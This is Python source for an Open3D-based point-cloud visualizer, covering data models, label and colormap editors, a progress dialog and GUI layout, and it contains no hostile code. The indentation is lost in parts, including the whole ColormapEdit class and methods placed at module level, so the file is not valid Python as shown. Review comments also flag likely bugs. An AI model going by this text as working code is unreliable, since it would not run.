        """Create a point cloud based on the data provided.
        The data should include name and points.
        """
        assert ("name" in data) # name is a required field
        assert ("points" in data) # 'points' is a required field
        name = data["name"]
        pts = self._convert_to_numpy(data["points"])
        tcloud = o3d.t.geometry.PointCloud(o3d.core.Device("CPU:0"))
        known_attrs = set()
        if pts.shape[1] >= 4:
            # We can't use inplace Tensor creation (e.g. from_numpy())
            # because the resulting arrays won't be contiguous. However,
            # TensorList can be inplace.
            xyz = pts[:, [0, 1, 2]]
            tcloud.point["points"] = Visualizer._make_tcloud_array(xyz,
                                                                   copy=True)
        else:
            tcloud.point["points"] = Visualizer._make_tcloud_array(pts)
        self.tclouds[name] = tcloud
        # Add scalar attributes and vector3 attributes
        attrs = {}
        for k, v in data.items():
            attr = self._convert_to_numpy(v)
            if attr is None:
                continue
            attr_name = k
            # Skip the raw "point" key (DatasetModel.load duplicates it as
            # "points" before calling this method).
            if attr_name == "point":
                continue
            new_name = self._attr_rename.get(attr_name)
            if new_name is not None:
                attr_name = new_name
            # Keep only 1-D (scalar) and 2-D (vector) attributes.
            if len(attr.shape) == 1 or len(attr.shape) == 2:
                attrs[attr_name] = attr
                known_attrs.add(attr_name)
        self._data[name] = attrs
        self._known_attrs[name] = known_attrs

    def _convert_to_numpy(self, ary):
        """Best-effort conversion of *ary* to a numpy array.

        Handles lists, numpy arrays, and (if installed) TensorFlow and
        PyTorch tensors; returns None when conversion is not possible.
        """
        if isinstance(ary, list):
            try:
                return np.array(ary, dtype='float32')
            except TypeError:
                return None
        elif isinstance(ary, np.ndarray):
            if len(ary.shape) == 2 and ary.shape[0] == 1:
                ary = ary[0] # "1D" array as 2D: [[1, 2, 3,...]]
            if ary.dtype.name.startswith('int'):
                return np.array(ary, dtype='float32')
            else:
                return ary
        # Optional-dependency probes: a failed import (or any tf/torch
        # error) simply means "not that kind of tensor".
        # NOTE(review): the bare excepts are deliberate best-effort, but
        # `except ImportError` would be more precise.
        try:
            import tensorflow as tf
            if isinstance(ary, tf.Tensor):
                return self._convert_to_numpy(ary.numpy())
        except:
            pass
        try:
            import torch
            if isinstance(ary, torch.Tensor):
                return self._convert_to_numpy(ary.detach().cpu().numpy())
        except:
            pass
        return None

    def get_attr(self, name, attr_name):
        """Get an attribute from data based on the name passed."""
        if name in self._data:
            attrs = self._data[name]
            if attr_name in attrs:
                return attrs[attr_name]
        return None

    def get_attr_shape(self, name, attr_name):
        """Get a shape from data based on the name passed."""
        attr = self.get_attr(name, attr_name)
        if attr is not None:
            return attr.shape
        return []

    def get_attr_minmax(self, attr_name, channel):
        """Get the minimum and maximum for an attribute.

        Results are cached per "name:attr:channel" key in _attr2minmax;
        the range is aggregated over all loaded clouds.
        """
        attr_key_base = attr_name + ":" + str(channel)
        attr_min = 1e30
        attr_max = -1e30
        for name in self._data.keys():
            key = name + ":" + attr_key_base
            if key not in self._attr2minmax:
                attr = self.get_attr(name, attr_name)
                if attr is None: # clouds may not have all the same attributes
                    continue
                if len(attr.shape) > 1:
                    attr = attr[:, channel]
                self._attr2minmax[key] = (attr.min(), attr.max())
            amin, amax = self._attr2minmax[key]
            attr_min = min(attr_min, amin)
            attr_max = max(attr_max, amax)
        # No cloud had this attribute: return an empty (0, 0) range.
        if attr_min > attr_max:
            return (0.0, 0.0)
        return (attr_min, attr_max)

    def get_available_attrs(self, names):
        """Get a list of attributes based on the name.

        Returns the sorted intersection of the attributes known for every
        name in *names* (empty list if none are known).
        """
        attr_names = None
        for n in names:
            known = self._known_attrs.get(n)
            if known is not None:
                if attr_names is None:
                    attr_names = known
                else:
                    attr_names = attr_names.intersection(known)
        if attr_names is None:
            return []
        return sorted(attr_names)

    def calc_bounds_for(self, name):
        """Calculate the bounds for a pointcloud.

        Returns [(min_x, min_y, min_z), (max_x, max_y, max_z)], or a zero
        box when the cloud is missing or empty.
        """
        if name in self.tclouds and not self.tclouds[name].is_empty():
            tcloud = self.tclouds[name]
            # Ideally would simply return tcloud.compute_aabb() here, but it can
            # be very slow on macOS with clang 11.0
            pts = tcloud.point["points"].numpy()
            min_val = (pts[:, 0].min(), pts[:, 1].min(), pts[:, 2].min())
            max_val = (pts[:, 0].max(), pts[:, 1].max(), pts[:, 2].max())
            return [min_val, max_val]
        else:
            return [(0.0, 0.0, 0.0), (0.0, 0.0, 0.0)]
class DataModel(Model):
    """Model backed by user-supplied, in-memory point-cloud dictionaries.

    Args:
        userdata: Iterable of data dictionaries to visualize; each must at
            least carry a "name" key.
    """

    def __init__(self, userdata):
        super().__init__()
        # Point-cloud creation is deferred to load() so this constructor
        # does not block the UI thread and the loading dialog can be shown.
        self._name2srcdata = {}
        for item in userdata:
            unique = item["name"]
            # Disambiguate duplicate names by appending underscores.
            while unique in self._data:
                unique += "_"
            self._init_data(unique)
            self._name2srcdata[unique] = item

    def load(self, name, fail_if_no_space=False):
        """Create the point cloud for *name* unless it already exists."""
        if not self.is_loaded(name):
            self.create_point_cloud(self._name2srcdata[name])

    def unload(self, name):
        """In-memory data is never evicted, so unloading is a no-op."""
        pass
class DatasetModel(Model):
    """The class used to manage a dataset model.
    Args:
        dataset: The 3D ML dataset to use. You can use the base dataset, sample datasets , or a custom dataset.
        split: A string identifying the dataset split that is usually one of 'training', 'test', 'validation', or 'all'.
        indices: The indices to be used for the datamodel. This may vary based on the split used.
    """

    def __init__(self, dataset, split, indices):
        super().__init__()
        self._dataset = None
        self._name2datasetidx = {}
        self._memory_limit = 8192 * 1024 * 1024 # memory limit in bytes
        self._current_memory_usage = 0
        # LRU queue of loaded names: oldest at the left, evicted first.
        self._cached_data = deque()
        self._dataset = dataset.get_split(split)
        if len(self._dataset) > 0:
            if indices is None:
                indices = range(0, len(self._dataset))
            # Some results from get_split() (like "training") are randomized.
            # Sort, so that the same index always returns the same piece of data.
            path2idx = {}
            for i in range(0, len(self._dataset.path_list)):
                path2idx[self._dataset.path_list[i]] = i
            real_indices = [path2idx[p] for p in sorted(path2idx.keys())]
            indices = [real_indices[idx] for idx in indices]
            # SemanticKITTI names its items <sequence#>_<timeslice#>,
            # "mm_nnnnnn". We'd like to use the hierarchical feature of the tree
            # to separate the sequences. We cannot change the name in the dataset
            # because this format is used to report algorithm results, so do it
            # here.
            underscore_to_slash = False
            if dataset.__class__.__name__ == "SemanticKITTI":
                underscore_to_slash = True
            for i in indices:
                info = self._dataset.get_attr(i)
                name = info["name"]
                if underscore_to_slash:
                    name = name.replace("_", "/")
                while name in self._data: # ensure each name is unique
                    name = name + "_"
                self._init_data(name)
                self._name2datasetidx[name] = i
            # These datasets store per-point RGB in the "feat" field.
            if dataset.__class__.__name__ in [
                    "Toronto3D", "Semantic3D", "S3DIS"
            ]:
                self._attr_rename["feat"] = "colors"
                self._attr_rename["feature"] = "colors"
        else:
            print("[ERROR] Dataset split has no data")

    def is_loaded(self, name):
        """Check if the data is loaded."""
        loaded = super().is_loaded(name)
        if loaded and name in self._cached_data:
            # make this point cloud the most recently used
            self._cached_data.remove(name)
            self._cached_data.append(name)
        return loaded

    def load(self, name, fail_if_no_space=False):
        """Check if data is not loaded, and then load the data.

        Evicts least-recently-used clouds when the memory budget would be
        exceeded; returns False only when fail_if_no_space is True and the
        new cloud does not fit.
        """
        assert (name in self._name2datasetidx)
        if self.is_loaded(name):
            return True
        idx = self._name2datasetidx[name]
        data = self._dataset.get_data(idx)
        data["name"] = name
        # create_point_cloud() expects the points under "points".
        data["points"] = data["point"]
        if 'bounding_boxes' in data:
            self.bounding_box_data.append(
                Model.BoundingBoxData(name, data['bounding_boxes']))
        self.create_point_cloud(data)
        size = self._calc_pointcloud_size(self._data[name], self.tclouds[name])
        if size + self._current_memory_usage > self._memory_limit:
            if fail_if_no_space:
                self.unload(name)
                return False
            else:
                # Remove oldest from cache
                remove_name = self._cached_data.popleft()
                remove_size = self._calc_pointcloud_size(
                    self._data[remove_name], self.tclouds[remove_name])
                self._current_memory_usage -= remove_size
                self.unload(remove_name)
                # Add new point cloud to cache
                self._cached_data.append(name)
                self._current_memory_usage += size
                return True
        else:
            self._current_memory_usage += size
            self._cached_data.append(name)
            return True

    def _calc_pointcloud_size(self, raw_data, pcloud):
        """Calculate the size of the pointcloud based on the rawdata."""
        pcloud_size = 0
        # Raw attribute arrays: assume 4 bytes per element (float32).
        for (attr, arr) in raw_data.items():
            pcloud_size += arr.size * 4
        # Point cloud consumes 64 bytes of per point of GPU memory
        pcloud_size += pcloud.point["points"].num_elements() * 64
        return pcloud_size

    def unload(self, name):
        """Unload the data (if it was loaded earlier)."""
        # Only unload if this was loadable; we might have an in-memory,
        # user-specified data created directly through create_point_cloud().
        if name in self._name2datasetidx:
            tcloud = o3d.t.geometry.PointCloud(o3d.core.Device("CPU:0"))
            self.tclouds[name] = tcloud
            self._data[name] = {}
            # NOTE(review): load() appends BoundingBoxData under the raw
            # `name`, but the search below matches the prefixed form, so it
            # appears never to find those entries — confirm how
            # bounding_box_data names are created elsewhere before relying
            # on this cleanup.
            bbox_name = Model.bounding_box_prefix + name
            for i in range(0, len(self.bounding_box_data)):
                if self.bounding_box_data[i].name == bbox_name:
                    self.bounding_box_data.pop(i)
                    break
class Visualizer:
"""The visualizer class for dataset objects and custom point clouds."""
    class LabelLUTEdit:
        """This class includes functionality for managing a labellut (label
        look-up-table).

        Wraps a gui.TreeView of per-label rows, each with a visibility
        checkbox and a color editor; visibility is encoded in the color's
        alpha channel (1.0 visible, 0.0 hidden).
        """

        def __init__(self):
            self.widget = gui.TreeView()
            self._on_changed = None # takes no args, returns no value
            self.clear()

        def clear(self):
            """Clears the look-up table."""
            self.widget.clear()
            self._label2color = {}

        def is_empty(self):
            """Checks if the look-up table is empty."""
            return len(self._label2color) == 0

        def get_colors(self):
            """Returns the RGBA colors, ordered by sorted label key."""
            return [
                self._label2color[label]
                for label in sorted(self._label2color.keys())
            ]

        def set_on_changed(self, callback): # takes no args, no return value
            self._on_changed = callback

        def set_labels(self, labellut):
            """Updates the labels based on look-up table passed."""
            self.widget.clear()
            root = self.widget.get_root_item()
            for key in sorted(labellut.labels.keys()):
                lbl = labellut.labels[key]
                color = lbl.color
                # NOTE(review): if lbl.color is a 3-element list, `+=`
                # appends the alpha in place and mutates the LabelLUT entry
                # itself — confirm this side effect is intended.
                if len(color) == 3:
                    color += [1.0]
                self._label2color[key] = color
                color = gui.Color(lbl.color[0], lbl.color[1], lbl.color[2])
                cell = gui.LUTTreeCell(
                    str(key) + ": " + lbl.name, True, color, None, None)
                cell.checkbox.set_on_checked(
                    self._make_on_checked(key, self._on_label_checked))
                cell.color_edit.set_on_value_changed(
                    self._make_on_color_changed(key,
                                                self._on_label_color_changed))
                self.widget.add_item(root, cell)

        def _make_on_color_changed(self, label, member_func):
            # Factory closing over `label` so each row gets its own callback.
            def on_changed(color):
                member_func(label, color)
            return on_changed

        def _on_label_color_changed(self, label, gui_color):
            # Keep the existing alpha (visibility) when the RGB changes.
            self._label2color[label] = [
                gui_color.red, gui_color.green, gui_color.blue,
                self._label2color[label][3]
            ]
            if self._on_changed is not None:
                self._on_changed()

        def _make_on_checked(self, label, member_func):
            # Factory closing over `label` so each row gets its own callback.
            def on_checked(checked):
                member_func(label, checked)
            return on_checked

        def _on_label_checked(self, label, checked):
            # Visibility toggle: alpha 1.0 shows the label, 0.0 hides it.
            if checked:
                alpha = 1.0
            else:
                alpha = 0.0
            color = self._label2color[label]
            self._label2color[label] = [color[0], color[1], color[2], alpha]
            if self._on_changed is not None:
                self._on_changed()
class ColormapEdit:
"""This class is used to create a color map for visualization of
points.
"""
def __init__(self, window, em):
self.colormap = None
self.widget = gui.Vert()
self._window = window
self._min_value = 0.0
self._max_value = 1.0
self._on_changed = None # takes no args, no return value
self._itemid2idx = {}
self._min_label = gui.Label("")
self._max_label = gui.Label("")
grid = gui.VGrid(2)
grid.add_child(gui.Label("Range (min):"))
grid.add_child(self._min_label)
grid.add_child(gui.Label("Range (max):"))
grid.add_child(self._max_label)
self.widget.add_child(grid)
self.widget.add_fixed(0.5 * em)
self.widget.add_child(gui.Label("Colormap"))
self._edit = gui.TreeView()
self._edit.set_on_selection_changed(self._on_selection_changed)
self.widget.add_child(self._edit)
self._delete = gui.Button("Delete")
self._delete.horizontal_padding_em = 0.5
self._delete.vertical_padding_em = 0
self._delete.set_on_clicked(self._on_delete)
self._add = gui.Button("Add")
self._add.horizontal_padding_em = 0.5
self._add.vertical_padding_em = 0
self._add.set_on_clicked(self._on_add)
h = gui.Horiz()
h.add_stretch()
h.add_child(self._delete)
h.add_fixed(0.25 * em)
h.add_child(self._add)
h.add_stretch()
self.widget.add_fixed(0.5 * em)
self.widget.add_child(h)
self.widget.add_fixed(0.5 * em)
def set_on_changed(self, callback): # takes no args, no return value
self._on_changed = callback
def update(self, colormap, min_val, max_val):
"""Updates the colormap based on the minimum and maximum values
passed.
"""
self.colormap = colormap
self._min_value = min_val
self._max_value = max_val
self._min_label.text = str(min_val)
self._max_label.text = str(max_val)
if self._min_value >= self._max_value:
self._max_value = self._min_value + 1.0
self._edit.clear()
self._itemid2idx = {}
root_id = self._edit.get_root_item()
for i in range(0, len(self.colormap.points)):
p = self.colormap.points[i]
color = gui.Color(p.color[0], p.color[1], p.color[2])
val = min_val + p.value * (max_val - min_val)
cell = gui.ColormapTreeCell(val, color, None, None)
cell.color_edit.set_on_value_changed(
self._make_on_color_changed(i, self._on_color_changed))
cell.number_edit.set_on_value_changed(
self._make_on_value_changed(i, self._on_value_changed))
item_id = self._edit.add_item(root_id, cell)
self._itemid2idx[item_id] = i
self._update_buttons_enabled()
def _make_on_color_changed(self, idx, member_func):
def on_changed(color):
member_func(idx, color)
return on_changed
def _on_color_changed(self, idx, gui_color):
self.colormap.points[idx].color = [
gui_color.red, gui_color.green, gui_color.blue
]
if self._on_changed is not None:
self._on_changed()
def _make_on_value_changed(self, idx, member_func):
def on_changed(value):
member_func(idx, value)
return on_changed
def _on_value_changed(self, idx, value):
value = (value - self._min_value) / (self._max_value -
self._min_value)
needs_update = False
value = min(1.0, max(0.0, value))
if ((idx > 0 and value < self.colormap.points[idx - 1].value) or
(idx < len(self.colormap.points) - 1 and
value > self.colormap.points[idx + 1].value)):
self.colormap.points[idx].value = value
o = self.colormap.points[idx]
self.colormap.points.sort(key=lambda cmap_pt: cmap_pt.value)
for i in range(0, len(self.colormap.points)):
if self.colormap.points[i] is o:
idx = i
break
needs_update = True
if idx > 0 and value == self.colormap.points[idx - 1].value:
if idx < len(self.colormap.points):
upper = self.colormap.points[idx + 1].value
else:
upper = 1.0
value = value + 0.5 * (upper - value)
needs_update = True
if idx < len(self.colormap.points
) - 1 and value == self.colormap.points[idx + 1].value:
if idx > 0:
lower = self.colormap.points[idx - 1].value
else:
lower = 0.0
value = lower + 0.5 * (value - lower)
needs_update = True
self.colormap.points[idx].value = value
if needs_update:
self._update_later()
if self._on_changed is not None:
self._on_changed()
def _on_selection_changed(self, item_id):
self._update_buttons_enabled()
def _on_delete(self):
if len(self.colormap.points) > 2:
idx = self._itemid2idx[self._edit.selected_item]
self.colormap.points = self.colormap.points[:
idx] + self.colormap.points[
idx + 1:]
del self._itemid2idx[self._edit.selected_item]
self._update_later()
if self._on_changed is not None:
self._on_changed()
def _on_add(self):
if self._edit.selected_item in self._itemid2idx: # maybe no selection
idx = self._itemid2idx[self._edit.selected_item]
if idx < len(self.colormap.points) - 1:
lower = self.colormap.points[idx]
upper = self.colormap.points[idx + 1]
else:
lower = self.colormap.points[len(self.colormap.points) - 2]
upper = self.colormap.points[len(self.colormap.points) - 1]
add_idx = min(idx + 1, len(self.colormap.points) - 1)
new_value = lower.value + 0.5 * (upper.value - lower.value)
new_color = [
0.5 * lower.color[0] + 0.5 * upper.color[0],
0.5 * lower.color[1] + 0.5 * upper.color[1],
0.5 * lower.color[2] + 0.5 * upper.color[2]
]
new_point = Colormap.Point(new_value, new_color)
self.colormap.points = self.colormap.points[:add_idx] + [
new_point
] + self.colormap.points[add_idx:]
self._update_later()
if self._on_changed is not None:
self._on_changed()
def _update_buttons_enabled(self):
if self._edit.selected_item in self._itemid2idx:
self._delete.enabled = len(self.colormap.points) > 2
self._add.enabled = True
else:
self._delete.enabled = False
self._add.enabled = False
def _update_later(self):
def update():
self.update(self.colormap, self._min_value, self._max_value)
self._window.post_redraw() # need to manually request redraw
gui.Application.instance.post_to_main_thread(self._window, update)
class ProgressDialog:
    """This class is used to manage the progress dialog displayed during
    visualization.

    Args:
        title: The title of the dialog box.
        window: The window where the progress dialog box should be displayed.
        n_items: The maximum number of items; each update() advances the bar
            by 1/n_items.
    """

    def __init__(self, title, window, n_items):
        self._window = window
        self._n_items = n_items
        em = window.theme.font_size
        self.dialog = gui.Dialog(title)
        # Trailing space pads the label so later, longer text still fits.
        self._label = gui.Label(title + "                ")
        self._layout = gui.Vert(0, gui.Margins(em, em, em, em))
        self.dialog.add_child(self._layout)
        self._layout.add_child(self._label)
        self._layout.add_fixed(0.5 * em)
        self._progress = gui.ProgressBar()
        self._progress.value = 0.0
        self._layout.add_child(self._progress)

    def set_text(self, text):
        """Set the label text on the dialog box."""
        self._label.text = text + "                "

    def post_update(self, text=None):
        """Post updates to the main thread.

        Args:
            text: Optional new label text to show along with the progress
                increment. GUI mutation must happen on the main thread, so
                both variants go through post_to_main_thread.
        """
        if text is None:
            gui.Application.instance.post_to_main_thread(
                self._window, self.update)
        else:
            def update_with_text():
                self.update()
                self._label.text = text
            gui.Application.instance.post_to_main_thread(
                self._window, update_with_text)

    def update(self):
        """Enumerate the progress in the dialog box."""
        # Advance one item's worth, clamped at 100%. Must run on UI thread.
        value = min(1.0, self._progress.value + 1.0 / self._n_items)
        self._progress.value = value
# Display names for the entries of the "Shader" combobox.
SOLID_NAME = "Solid Color"
LABELS_NAME = "Label Colormap"
RAINBOW_NAME = "Colormap (Rainbow)"
GREYSCALE_NAME = "Colormap (Greyscale)"
COLOR_NAME = "RGB"

# Pseudo-attribute names used for coloring by a coordinate axis.
X_ATTR_NAME = "x position"
Y_ATTR_NAME = "y position"
Z_ATTR_NAME = "z position"
def __init__(self):
    """Initialize visualizer state; widgets are built in _init_user_interface()."""
    self._objects = None  # data model (DatasetModel or DataModel)
    self._name2treenode = {}  # geometry/group name -> tree cell widget
    self._name2treeid = {}  # group-prefix name -> tree item id
    self._treeid2name = {}  # tree item id -> name (inverse of the above)
    self._attrname2lut = {}  # attribute name -> LabelLUT
    self._colormaps = {}  # shader display name -> Colormap
    self._shadername2panelidx = {}  # shader name -> index in stacked panels
    self._gradient = rendering.Gradient()
    self._scalar_min = 0.0
    self._scalar_max = 1.0
    self._animation_frames = []  # names shown one-at-a-time in Animation tab
    self._last_animation_time = time.time()
    self._animation_delay_secs = 0.100  # ~10 fps playback
    self._consolidate_bounding_boxes = False
    # Guard flag: suppress renderer updates during batched UI changes.
    self._dont_update_geometry = False
def _init_dataset(self, dataset, split, indices):
    """Use an ml3d dataset split as the data model."""
    self._objects = DatasetModel(dataset, split, indices)

def _init_data(self, data):
    """Use a user-supplied list of point-cloud dicts as the data model."""
    self._objects = DataModel(data)
def _init_user_interface(self, title, width, height):
    """Create the window, the 3D scene widget, and the right-hand panel.

    Widget creation order matters: children are laid out in the order they
    are added to their parents.
    """
    self.window = gui.Application.instance.create_window(
        title, width, height)
    self.window.set_on_layout(self._on_layout)
    em = self.window.theme.font_size  # layout unit scaled to the font size

    self._3d = gui.SceneWidget()
    self._3d.enable_scene_caching(True)  # makes UI _much_ more responsive
    self._3d.scene = rendering.Open3DScene(self.window.renderer)
    self.window.add_child(self._3d)

    self._panel = gui.Vert()
    self.window.add_child(self._panel)

    indented_margins = gui.Margins(em, 0, em, 0)

    # View controls
    ctrl = gui.CollapsableVert("Mouse Controls", 0, indented_margins)

    arcball = gui.Button("Arcball")
    arcball.set_on_clicked(self._on_arcball_mode)
    arcball.horizontal_padding_em = 0.5
    arcball.vertical_padding_em = 0
    fly = gui.Button("Fly")
    fly.set_on_clicked(self._on_fly_mode)
    fly.horizontal_padding_em = 0.5
    fly.vertical_padding_em = 0
    reset = gui.Button("Re-center")
    reset.set_on_clicked(self._on_reset_camera)
    reset.horizontal_padding_em = 0.5
    reset.vertical_padding_em = 0
    h = gui.Horiz(0.25 * em)
    h.add_stretch()
    h.add_child(arcball)
    h.add_child(fly)
    h.add_fixed(em)
    h.add_child(reset)
    h.add_stretch()
    ctrl.add_child(h)

    ctrl.add_fixed(em)
    self._panel.add_child(ctrl)

    # Dataset
    model = gui.CollapsableVert("Dataset", 0, indented_margins)

    vgrid = gui.VGrid(2, 0.25 * em)
    model.add_child(vgrid)
    model.add_fixed(0.5 * em)

    bgcolor = gui.ColorEdit()
    bgcolor.color_value = gui.Color(1, 1, 1)
    # Apply the default background once before hooking the change callback.
    self._on_bgcolor_changed(bgcolor.color_value)
    bgcolor.set_on_value_changed(self._on_bgcolor_changed)
    vgrid.add_child(gui.Label("BG Color"))
    vgrid.add_child(bgcolor)

    view_tab = gui.TabControl()
    view_tab.set_on_selected_tab_changed(self._on_display_tab_changed)
    model.add_child(view_tab)

    # ... model list
    self._dataset = gui.TreeView()
    self._dataset.set_on_selection_changed(
        self._on_dataset_selection_changed)
    view_tab.add_tab("List", self._dataset)

    # ... animation slider
    v = gui.Vert()
    view_tab.add_tab("Animation", v)
    v.add_fixed(0.25 * em)
    grid = gui.VGrid(2)
    v.add_child(grid)

    self._slider = gui.Slider(gui.Slider.INT)
    self._slider.set_limits(0, len(self._objects.data_names))
    self._slider.set_on_value_changed(self._on_animation_slider_changed)
    grid.add_child(gui.Label("Index"))
    grid.add_child(self._slider)

    self._slider_current = gui.Label("")
    grid.add_child(gui.Label("Showing"))
    grid.add_child(self._slider_current)

    v.add_fixed(em)

    self._play = gui.Button("Play")
    self._play.horizontal_padding_em = 0.5
    self._play.vertical_padding_em = 0
    self._play.set_on_clicked(self._on_start_animation)
    h = gui.Horiz()
    h.add_stretch()
    h.add_child(self._play)
    h.add_stretch()
    v.add_child(h)

    self._panel.add_child(model)

    # Coloring
    properties = gui.CollapsableVert("Properties", 0, indented_margins)

    grid = gui.VGrid(2, 0.25 * em)

    # ... data source
    self._datasource_combobox = gui.Combobox()
    self._datasource_combobox.set_on_selection_changed(
        self._on_datasource_changed)
    self._colormap_channel = gui.Combobox()
    self._colormap_channel.add_item("0")
    self._colormap_channel.set_on_selection_changed(
        self._on_channel_changed)
    h = gui.Horiz()
    h.add_child(self._datasource_combobox)
    h.add_fixed(em)
    h.add_child(gui.Label("Index"))
    h.add_child(self._colormap_channel)
    grid.add_child(gui.Label("Data"))
    grid.add_child(h)

    # ... shader
    self._shader = gui.Combobox()
    self._shader.add_item(self.SOLID_NAME)
    self._shader.add_item(self.LABELS_NAME)
    self._shader.add_item(self.RAINBOW_NAME)
    self._shader.add_item(self.GREYSCALE_NAME)
    self._shader.add_item(self.COLOR_NAME)
    self._colormaps[self.RAINBOW_NAME] = Colormap.make_rainbow()
    self._colormaps[self.GREYSCALE_NAME] = Colormap.make_greyscale()
    self._shader.selected_index = 0
    self._shader.set_on_selection_changed(self._on_shader_changed)
    grid.add_child(gui.Label("Shader"))
    grid.add_child(self._shader)

    properties.add_child(grid)

    # ... shader panels (stacked: only the active shader's panel is shown)
    self._shader_panels = gui.StackedWidget()
    panel_idx = 0

    # ... sub-panel: single color
    self._color_panel = gui.Vert()
    self._shader_panels.add_child(self._color_panel)
    self._shadername2panelidx[self.SOLID_NAME] = panel_idx
    panel_idx += 1
    self._color = gui.ColorEdit()
    self._color.color_value = gui.Color(0.5, 0.5, 0.5)
    self._color.set_on_value_changed(self._on_shader_color_changed)
    h = gui.Horiz()
    h.add_child(gui.Label("Color"))
    h.add_child(self._color)
    self._color_panel.add_child(h)

    # ... sub-panel: labels
    self._labels_panel = gui.Vert()
    self._shader_panels.add_child(self._labels_panel)
    self._shadername2panelidx[self.LABELS_NAME] = panel_idx
    panel_idx += 1
    self._label_edit = self.LabelLUTEdit()
    self._label_edit.set_on_changed(self._on_labels_changed)
    self._labels_panel.add_child(gui.Label("Labels"))
    self._labels_panel.add_child(self._label_edit.widget)

    # ... sub-panel: colormap (rainbow and greyscale share one panel)
    self._colormap_panel = gui.Vert()
    self._shader_panels.add_child(self._colormap_panel)
    self._shadername2panelidx[self.RAINBOW_NAME] = panel_idx
    self._shadername2panelidx[self.GREYSCALE_NAME] = panel_idx
    panel_idx += 1
    self._colormap_edit = self.ColormapEdit(self.window, em)
    self._colormap_edit.set_on_changed(self._on_colormap_changed)
    self._colormap_panel.add_child(self._colormap_edit.widget)

    # ... sub-panel: RGB
    self._rgb_panel = gui.Vert()
    self._shader_panels.add_child(self._rgb_panel)
    self._shadername2panelidx[self.COLOR_NAME] = panel_idx
    panel_idx += 1
    self._rgb_combo = gui.Combobox()
    self._rgb_combo.add_item("255")
    self._rgb_combo.add_item("1.0")
    self._rgb_combo.set_on_selection_changed(self._on_rgb_multiplier)
    h = gui.Horiz(0.5 * em)
    h.add_child(gui.Label("Max value"))
    h.add_child(self._rgb_combo)
    self._rgb_panel.add_child(h)

    properties.add_fixed(em)
    properties.add_child(self._shader_panels)
    self._panel.add_child(properties)

    # Populate tree, etc.
    for name in self._objects.data_names:
        self._add_tree_name(name)

    self._update_datasource_combobox()
def set_lut(self, attr_name, lut):
    """Set the LUT for a specific attribute.

    Args:
        attr_name: The attribute name as string.
        lut: The LabelLUT object to use when coloring by that attribute.
    """
    self._attrname2lut[attr_name] = lut
def setup_camera(self):
    """Set up camera for visualization.

    Frames the camera on the combined axis-aligned bounds of all
    currently checked geometries.
    """
    names = self._get_selected_names()
    lo = [1e30, 1e30, 1e30]
    hi = [-1e30, -1e30, -1e30]
    for bound in (self._objects.calc_bounds_for(n) for n in names):
        lo = [min(a, b) for a, b in zip(lo, bound[0])]
        hi = [max(a, b) for a, b in zip(hi, bound[1])]
    bounds = o3d.geometry.AxisAlignedBoundingBox(lo, hi)
    self._3d.setup_camera(60, bounds, bounds.get_center())
def show_geometries_under(self, name, show):
    """Show or hide every geometry whose name starts with *name*.

    Args:
        name: Name prefix (a tree group such as "dir/").
        show: True to show, False to hide; checkboxes are synced to match.
    """
    prefix = name
    for (n, node) in self._name2treenode.items():
        if n.startswith(prefix):
            self._3d.scene.show_geometry(n, show)
            node.checkbox.checked = show
    self._3d.force_redraw()
def _add_tree_name(self, name, is_geometry=True):
    """Add *name* to the dataset tree, creating parent group nodes as needed.

    Args:
        name: Slash-separated name; each "a/", "a/b/" prefix becomes a
            checkable group node.
        is_geometry: If True, the leaf is colored red ("not loaded yet").
    """
    names = name.split("/")
    parent = self._dataset.get_root_item()
    for i in range(0, len(names) - 1):
        n = "/".join(names[:i + 1]) + "/"
        if n in self._name2treeid:
            parent = self._name2treeid[n]
        else:
            # Bind n as a default argument: closing over the loop variable
            # directly would make every parent checkbox toggle the *last*
            # prefix created, because Python closures are late-binding.
            def on_parent_checked(checked, n=n):
                self.show_geometries_under(n, checked)

            cell = gui.CheckableTextTreeCell(n, True, on_parent_checked)
            parent = self._dataset.add_item(parent, cell)
            self._name2treenode[n] = cell
            self._name2treeid[n] = parent
            self._treeid2name[parent] = n

    def on_checked(checked):
        self._3d.scene.show_geometry(name, checked)
        if self._is_tree_name_geometry(name):
            # available attrs could change
            self._update_datasource_combobox()
            self._update_bounding_boxes()
        self._3d.force_redraw()

    cell = gui.CheckableTextTreeCell(names[-1], True, on_checked)
    if is_geometry:
        # Red marks "not loaded yet"; turned green once loading succeeds.
        cell.label.text_color = gui.Color(1.0, 0.0, 0.0, 1.0)
    node = self._dataset.add_item(parent, cell)
    self._name2treenode[name] = cell
    self._treeid2name[node] = name

    self._slider.set_limits(0, len(self._objects.data_names) - 1)
    if len(self._objects.data_names) == 1:
        self._slider_current.text = name
def _load_geometry(self, name, ui_done_callback):
    """Load one geometry on a worker thread, showing a progress dialog.

    Args:
        name: Name of the geometry to load.
        ui_done_callback: Called on the main thread after loading finishes.
    """
    progress_dlg = Visualizer.ProgressDialog("Loading...", self.window, 2)
    progress_dlg.set_text("Loading " + name + "...")

    def load_thread():
        # Return value intentionally ignored here; tree coloring for
        # load success/failure is handled by _update_geometry().
        self._objects.load(name)
        progress_dlg.post_update("Loading " + name + "...")
        gui.Application.instance.post_to_main_thread(
            self.window, ui_done_callback)
        gui.Application.instance.post_to_main_thread(
            self.window, self.window.close_dialog)

    self.window.show_dialog(progress_dlg.dialog)
    threading.Thread(target=load_thread).start()
def _load_geometries(self, names, ui_done_callback):
    """Load several geometries on a worker thread with progress feedback.

    Args:
        names: Geometry names to load, in order. Must be non-empty.
        ui_done_callback: Called on the main thread when loading ends.
    """
    # Progress has: len(names) items + ui_done_callback
    progress_dlg = Visualizer.ProgressDialog("Loading...", self.window,
                                             len(names) + 1)
    progress_dlg.set_text("Loading " + names[0] + "...")

    def load_thread():
        for i in range(0, len(names)):
            result = self._objects.load(names[i], True)
            if i + 1 < len(names):
                text = "Loading " + names[i + 1] + "..."
            else:
                text = "Creating GPU objects..."
            progress_dlg.post_update(text)
            if result:
                # Loaded successfully: mark the tree entry green.
                self._name2treenode[names[i]].label.text_color = gui.Color(
                    0.0, 1.0, 0.0, 1.0)
            else:
                # A failed load aborts the remaining items.
                break
        gui.Application.instance.post_to_main_thread(
            self.window, ui_done_callback)
        gui.Application.instance.post_to_main_thread(
            self.window, self.window.close_dialog)

    self.window.show_dialog(progress_dlg.dialog)
    threading.Thread(target=load_thread).start()
def _update_geometry(self, check_unloaded=False):
    """Push all clouds in the data model into the renderer.

    Args:
        check_unloaded: If True, first remove scene geometry for objects
            that are no longer loaded.
    """
    if check_unloaded:
        for name in self._objects.data_names:
            if not self._objects.is_loaded(name):
                self._3d.scene.remove_geometry(name)

    material = self._get_material()
